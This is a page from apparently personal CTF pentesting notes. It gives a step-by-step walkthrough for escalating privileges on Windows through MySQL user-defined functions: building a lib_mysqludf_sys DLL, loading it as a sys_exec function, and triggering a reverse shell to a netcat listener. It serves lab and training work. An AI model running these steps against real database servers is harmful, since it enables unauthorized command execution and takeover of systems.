Windows, Linux, and Active Directory CTF Notes
  • Table of Content
  • Word of Wisdom
  • Enumeration
    • Initial enums
    • Q check on open port response
    • Q password spray
    • Q SMB NTLMv2 Theft
    • Scan behind a squid proxy
    • Port 80/443 - Web
      • CTF - param abuse
      • GitHub content access
    • Port 21 - FTP
    • Port 22 - SSH
      • Symlink and Debian OpenSSL Predictable PRNG
      • SSH private key crack
      • Create a key copy w/o pwd
    • Port 25 - SMTP
    • Port 53 - DNS
    • Port 69 - UDP/TFTP
      • AT-TFTP Server 1.9
    • Port 79 - Finger
    • Port 88 - Kerberos
    • Port 110 - Pop3
    • Port 111 - Rpcbind/portmapper
    • Port 161 - SNMP
    • Port 139/445 - SMB
    • Port 143/993 - IMAP
    • Port 161/162 - UDP/SNMP
    • Port 389/636 - LDAP
    • Port 873 - rsync
    • Port 2049 - NFS
    • Port 3306 - Mysql
    • Port 1403 - MSSQL
    • Port 5437 - Postgres
    • Port 6379 - Redis
    • Port 3389 - RDP
    • Port 5985,5986 - WinRM
    • Port 1098/1099- Pentesting Java RMI
    • Port Knocking
  • Active Directory
    • Working Directory and Files
    • First Recon
    • User Recon
      • Username bruteforcing
      • Enum SMB Shares
      • SMB Responder
    • Init Cred Acess
      • Kerberos Attack w/o password
      • Password Attack
        • Hydra
      • SYSVOL and NETLOGON
    • Init NTLMv2 Theft
    • Kerberos Quick Win
      • Service Account - Kerberoast
      • SMB Replay
    • Domain Recon
      • AD Interesting file location
    • AD Attack Recon
    • Bloodhound Walkthrough
      • Common Usage
      • Manual Path Analysis
      • AD-Miner
      • ACL Abuse
    • Kerberos Attack
      • Kerberoast
      • ASREProast
      • Get the ticket
      • Pass the ticket
      • Overpass-the-hash Attack
      • Kerberos based Enum and Attack Samples
      • Silver Ticket
        • CTF: Silver Ticket - Privilege Escalation
      • Golden Ticket
        • CTF: Golden Ticket Walkthrough
    • ACL Abuse
      • ForcePasswordChange
      • ACL Abuse and Shadow Credential
      • Resource Based Constrained Delegation
    • Group Policy Abuse
      • GPO modification attack
      • GPP (Group Policy Preference) credential discovery
    • Logon Script Abuse
    • ADCS attacks
    • KrbRelayUp
    • Azure Connect Exploit
    • gMSA account
    • Dumping Domain Credentials
      • Secretdump.py
      • ntdsutil.exe - no credential required
      • Diskshadow - No credential required
      • vssadmin - no credential required
      • Wmic and Vssadmin Shadow Copy
      • Mimikatz
  • Windows Priv
    • Quick win
      • Local Service to SYSTEM
    • Initial Harvesting - Usual Spots
    • UAC Bypass
      • UACME - Best
    • Enable Privileges
    • Local Enumeration
      • Page
      • .Net Version Check
      • File and Directory permissions
    • Other quick wins
    • Service Privilege Escalation
    • Scheduled Tasks
    • Token Abuse
      • SeBackup (with SeRestorePrivilege)
      • SeManageVolumePrivilege
      • SeRetorePrivilege
      • SeTakeOwnership
      • SeDebugPrivilege
    • Runas
    • Potato
    • GMSA password retrieval
    • LAPS password
    • MySQL
      • Write permission
      • Library - MySQL UDF
  • Linux Priv
    • Common Tips
      • Local File Enumeration
    • Quick win - Sudo -l
    • READ Source code & binary
    • Local Enumeration Tools
    • Sudo
      • GTFOBins - Sudo
      • LD_PRELOAD
      • LD_LIBRARY_PATH
      • Sudo via intended functionality
      • Sudo 1.8.27 Security Bypass
      • CVE 2019-18634 (Buf Overflow)
      • CVE 2021-3156 (Heap Overflow)
    • SUID / SGID Files
    • Weak File Permissions
      • Writeable /etc/passwd
      • Readable /etc/shadow
      • Writeable scripts - run by root
    • Cron Jobs
      • PATH environment abuse
      • PATH environment abuse 2
      • Wildcard and cronjob
    • Password Hunting
    • ld.so PrivEsc Example
    • Add more from basic to modern
    • No_root_squash option
    • Ansible
    • YAML
    • Docker
      • Docker escape
      • lxd/lxc group
      • Moby Docker Engine PrivEsc
    • Git
    • Python Code Injection
    • Apache Conf Privilege Escalation
  • Credential Access
    • Default password and common password
    • Password cracking
      • Hash Cracking Techniques
      • Linux shadow
      • Linux shadow passwd
      • Windows - SAM hash
      • Windows - SecureString in Powershell
      • SSH id_rsa
      • Zip
      • PDF
      • Office
      • KeePass database
      • JWT Token
      • VNC
    • Brute-Force attack
    • Password spraying
    • Extract credentials from images
  • Pivoting / Network
    • Ligolo-ng
      • Local ports(127.0.0.1)
    • SSH
      • SSH key gen for remote port forwarding
      • ssh permission
    • Quick port-scan
    • sshuttle
    • Ping check
  • File Transfer
    • Recursive Download
    • Recursive Read
    • Zip/Unzip
  • Web Attacks
    • Web Enumeration
    • File Upload
      • File Upload with reverse shell
      • File Extension Discovery for upload
      • File Upload Bypass
        • .htaccess to allow extension
        • File Upload Bypass Checklist
    • SQL Injection
      • sqlmap
    • LFI/RFI
      • Concept
      • Log poisoning
      • PHP Wrapper
      • Dir Enumeration
    • Command Injection
    • XSS
    • Mass Assignment
    • WebDAV
  • Database Attacks
    • MySQL
      • Privilege Escalation - MySQL 4.x/5.0
    • MSSQL
      • sqsh
      • mssqlclient
      • Responder
      • Directory Enumeration
    • Postgresql
    • Oracle
    • Redis
      • PHP web-shell
      • SSH key push
      • Cron job
      • Load Redis module
    • Mongo
    • KeePass kdbx
    • SQLite
  • Metasploit
    • Basic Usage
    • msfvenom
    • Local Exploit Suggester
    • Update Metasploit
  • File Enum & Hunting
    • Linux - Local Password/Files
    • Win - Local Passwords/Files
    • SSH
    • Binary/Image Analysis
  • Unix Commands
    • awk and sed
    • grep, cut, list size, and sort
    • archive, compress, and extract
  • Code Analysis
    • Framework Checker
    • Access to Source Code
    • Windows exe disassebler
  • Reverse Shell
    • Open Port Check
  • Remote Access & Lateral Movement
  • RCE Collection
    • Linux
      • Shellshock
      • preg_replace() in PHP
      • Asset () in PHP
      • Eval() in Ruby
      • Eval() in Python
      • str() in Python
    • Windows
      • Macro
      • MS17-010
      • ViewState
    • CMS and Platform
      • WebDav
      • Jenkins / askjeeves
      • H2 Database Engine
      • WordPress
      • Tomcat
      • Joomla!
    • Software
      • ClamAV
  • Compiling
    • C# example - Generic
    • C# example - Run
  • Interactive Shell
  • Reverse Shell
  • Post Exploitation
    • Backdoor
    • Secrentsdump.py
    • mimikatz
    • meterpreter - mimikatz
    • samdump2
    • spraykatz
Powered by GitBook
On this page
  1. Windows Priv
  2. MySQL

Library - MySQL UDF

PreviousWrite permissionNextLinux Priv

Last updated 1 year ago

If the mysql server is running as root (or a different more privileged user) you can make it execute commands. For that, you need to use user defined functions. And to create a user defined you will need a library for the OS that is running mysql.

The malicious library to use can be found inside sqlmap and inside metasploit by doing locate "*lib_mysqludf_sys*". The .so files are linux libraries and the .dll are the Windows ones, choose the one you need.

If the following steps do not work, check the link above!

  1. Let's grab the following code. https://gist.githubusercontent.com/kazkansouh/3476a8c8846472da06f980494ac2c457/raw/559eb0dc4f4d0d5d1fbf69e2965bda292f8511ff/mysql-udf-build.sh

  2. Run the script. You will see a dll (lib_mysqludf_sys_win_64.dll) created in local directory. 

./mysql-udf-build.sh 64 win .

  1. Connect to the Database

  1. Wtih snap, run the following command.

sudo snap install dbeaver-ce

  1. Run dbeaver-ce and supply 'IP address' and a credential to connect.

  2. Check the plugin directory. Run the following SQL script. 

SHOW VARIABLES LIKE 'plugin_dir';

  1. Check or/and create a directory to the plugin (C:\xampp\mysql\lib\plugin\)

  2. Store lib_mysqludf_sys_win_64.dll there (C:\xampp\mysql\lib\plugin\lib_mysqludf_sys_win_64.dll)

  3. Run the following SQL query to create a function. 

CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_win_64.dll';

  1. Set up a listener. 

rlwrap nc -nlvp 4444

  1. Run the following SQL query to run a reverse shell. 

select sys_exec('shell') # Use a powershell encrypted one

Connected. This time, this user has a SeImpersonatePrivilege.

Logo3306 - Pentesting MysqlHackTricks
LogoDownloadDBeaver Community